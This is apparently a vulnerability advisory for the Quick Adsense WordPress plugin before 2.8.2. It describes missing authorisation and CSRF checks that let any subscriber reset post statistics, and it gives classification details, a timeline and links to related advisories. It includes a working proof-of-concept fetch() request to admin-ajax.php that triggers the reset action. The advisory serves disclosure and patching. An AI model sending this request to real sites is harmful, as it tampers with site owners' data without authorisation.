Quick Adsense < 2.8.2 – Subscriber+ Post Stats Reset | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks in some of its AJAX actions allowing any authenticated users, such as subscribers to call them and reset Posts stats for example

Proof of Concept

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "accept": "*/*",
    "accept-language": "en-US,en;q=0.9",
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "action=quick_adsense_onpost_ad_reset_stats&index=1",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});

In v2.8.1, a nonce is needed and is leaked in backend pages of any authenticated user (search for quick_adsense)

Affects Plugins

Fixed in 2.8.2

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Jan w Oleju

Submitter

Jan w Oleju

Verified

Yes

WPVDB ID

79afd42b-4803-419b-9059-74fb4e74dfbb

Timeline

Publicly Published

2022-04-02 (about 4 years ago)

Added

2022-03-21 (about 4 years ago)

Last Updated

2022-03-21 (about 4 years ago)

Other

Published

Title

Published

2025-04-02

Title

Residential Address Detection < 2.5.5 - Missing Authorization

Published

2025-06-05

Title

Viral Loops WP Integration <= 3.8.1 - Missing Authorization

Published

2025-05-15

Title

Experto CTA Widget – Call To Action, Sticky CTA, Floating Button Plugin < 1.2.1 - Missing Authorization to Unauthenticated Settings Update

Published

2024-04-22

Title

WP Club Manager < 2.2.12 - Missing Authorization

Published

2024-08-16

Title

Print Barcode Labels for your WooCommerce products/orders < 3.4.10 - Missing Authorization